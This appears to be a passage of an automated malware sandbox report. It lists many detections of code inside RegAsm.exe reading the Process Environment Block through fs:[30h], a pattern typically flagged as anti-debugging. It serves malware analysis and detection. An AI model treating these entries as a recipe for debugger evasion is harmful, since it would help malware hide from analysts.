                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A456 mov eax, dword ptr fs:[00000030h]1_2_0290A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E443 mov eax, dword ptr fs:[00000030h]1_2_0288E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284645D mov eax, dword ptr fs:[00000030h]1_2_0284645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287245A mov eax, dword ptr fs:[00000030h]1_2_0287245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DC460 mov ecx, dword ptr fs:[00000030h]1_2_028DC460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287A470 mov eax, dword ptr fs:[00000030h]1_2_0287A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884588 mov eax, dword ptr fs:[00000030h]1_2_02884588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852582 mov eax, dword ptr fs:[00000030h]1_2_02852582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852582 mov ecx, dword ptr fs:[00000030h]1_2_02852582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E59C mov eax, dword ptr fs:[00000030h]1_2_0288E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D05A7 mov eax, dword ptr fs:[00000030h]1_2_028D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h]1_2_028745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028745B1 mov eax, dword ptr fs:[00000030h]1_2_028745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h]1_2_0288E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288E5CF mov eax, dword ptr fs:[00000030h]1_2_0288E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028565D0 mov eax, dword ptr fs:[00000030h]1_2_028565D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h]1_2_0288A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A5D0 mov eax, dword ptr fs:[00000030h]1_2_0288A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E5E7 mov eax, dword ptr fs:[00000030h]1_2_0287E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028525E0 mov eax, dword ptr fs:[00000030h]1_2_028525E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h]1_2_0288C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C5ED mov eax, dword ptr fs:[00000030h]1_2_0288C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6500 mov eax, dword ptr fs:[00000030h]1_2_028E6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924500 mov eax, dword ptr fs:[00000030h]1_2_02924500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860535 mov eax, dword ptr fs:[00000030h]1_2_02860535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E53E mov eax, dword ptr fs:[00000030h]1_2_0287E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858550 mov eax, dword ptr fs:[00000030h]1_2_02858550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858550 mov eax, dword ptr fs:[00000030h]1_2_02858550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288656A mov eax, dword ptr fs:[00000030h]1_2_0288656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285EA80 mov eax, dword ptr fs:[00000030h]1_2_0285EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924A80 mov eax, dword ptr fs:[00000030h]1_2_02924A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888A90 mov edx, dword ptr fs:[00000030h]1_2_02888A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h]1_2_02858AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858AA0 mov eax, dword ptr fs:[00000030h]1_2_02858AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6AA4 mov eax, dword ptr fs:[00000030h]1_2_028A6AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028A6ACC mov eax, dword ptr fs:[00000030h]1_2_028A6ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850AD0 mov eax, dword ptr fs:[00000030h]1_2_02850AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h]1_2_02884AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02884AD0 mov eax, dword ptr fs:[00000030h]1_2_02884AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h]1_2_0288AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288AAEE mov eax, dword ptr fs:[00000030h]1_2_0288AAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DCA11 mov eax, dword ptr fs:[00000030h]1_2_028DCA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287EA2E mov eax, dword ptr fs:[00000030h]1_2_0287EA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288CA24 mov eax, dword ptr fs:[00000030h]1_2_0288CA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h]1_2_02874A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02874A35 mov eax, dword ptr fs:[00000030h]1_2_02874A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856A50 mov eax, dword ptr fs:[00000030h]1_2_02856A50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860A5B mov eax, dword ptr fs:[00000030h]1_2_02860A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860A5B mov eax, dword ptr fs:[00000030h]1_2_02860A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h]1_2_0288CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h]1_2_0288CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288CA6F mov eax, dword ptr fs:[00000030h]1_2_0288CA6F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FEA60 mov eax, dword ptr fs:[00000030h]1_2_028FEA60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CCA72 mov eax, dword ptr fs:[00000030h]1_2_028CCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CCA72 mov eax, dword ptr fs:[00000030h]1_2_028CCA72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02904BB0 mov eax, dword ptr fs:[00000030h]1_2_02904BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02904BB0 mov eax, dword ptr fs:[00000030h]1_2_02904BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860BBE mov eax, dword ptr fs:[00000030h]1_2_02860BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860BBE mov eax, dword ptr fs:[00000030h]1_2_02860BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h]1_2_02850BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h]1_2_02850BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850BCD mov eax, dword ptr fs:[00000030h]1_2_02850BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h]1_2_02870BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h]1_2_02870BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02870BCB mov eax, dword ptr fs:[00000030h]1_2_02870BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FEBD0 mov eax, dword ptr fs:[00000030h]1_2_028FEBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h]1_2_02858BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h]1_2_02858BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858BF0 mov eax, dword ptr fs:[00000030h]1_2_02858BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287EBFC mov eax, dword ptr fs:[00000030h]1_2_0287EBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DCBF0 mov eax, dword ptr fs:[00000030h]1_2_028DCBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CEB1D mov eax, dword ptr fs:[00000030h]1_2_028CEB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924B00 mov eax, dword ptr fs:[00000030h]1_2_02924B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287EB20 mov eax, dword ptr fs:[00000030h]1_2_0287EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287EB20 mov eax, dword ptr fs:[00000030h]1_2_0287EB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02918B28 mov eax, dword ptr fs:[00000030h]1_2_02918B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02918B28 mov eax, dword ptr fs:[00000030h]1_2_02918B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h]1_2_02922B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h]1_2_02922B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h]1_2_02922B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02922B57 mov eax, dword ptr fs:[00000030h]1_2_02922B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F8B42 mov eax, dword ptr fs:[00000030h]1_2_028F8B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6B40 mov eax, dword ptr fs:[00000030h]1_2_028E6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6B40 mov eax, dword ptr fs:[00000030h]1_2_028E6B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291AB40 mov eax, dword ptr fs:[00000030h]1_2_0291AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02848B50 mov eax, dword ptr fs:[00000030h]1_2_02848B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02904B4B mov eax, dword ptr fs:[00000030h]1_2_02904B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02904B4B mov eax, dword ptr fs:[00000030h]1_2_02904B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FEB50 mov eax, dword ptr fs:[00000030h]1_2_028FEB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284CB7E mov eax, dword ptr fs:[00000030h]1_2_0284CB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850887 mov eax, dword ptr fs:[00000030h]1_2_02850887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DC89D mov eax, dword ptr fs:[00000030h]1_2_028DC89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287E8C0 mov eax, dword ptr fs:[00000030h]1_2_0287E8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029208C0 mov eax, dword ptr fs:[00000030h]1_2_029208C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C8F9 mov eax, dword ptr fs:[00000030h]1_2_0288C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C8F9 mov eax, dword ptr fs:[00000030h]1_2_0288C8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291A8E4 mov eax, dword ptr fs:[00000030h]1_2_0291A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DC810 mov eax, dword ptr fs:[00000030h]1_2_028DC810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov eax, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov eax, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov eax, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov ecx, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov eax, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02872835 mov eax, dword ptr fs:[00000030h]1_2_02872835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F483A mov eax, dword ptr fs:[00000030h]1_2_028F483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F483A mov eax, dword ptr fs:[00000030h]1_2_028F483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A830 mov eax, dword ptr fs:[00000030h]1_2_0288A830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02862840 mov ecx, dword ptr fs:[00000030h]1_2_02862840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854859 mov eax, dword ptr fs:[00000030h]1_2_02854859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854859 mov eax, dword ptr fs:[00000030h]1_2_02854859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02880854 mov eax, dword ptr fs:[00000030h]1_2_02880854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6870 mov eax, dword ptr fs:[00000030h]1_2_028E6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6870 mov eax, dword ptr fs:[00000030h]1_2_028E6870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE872 mov eax, dword ptr fs:[00000030h]1_2_028DE872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE872 mov eax, dword ptr fs:[00000030h]1_2_028DE872
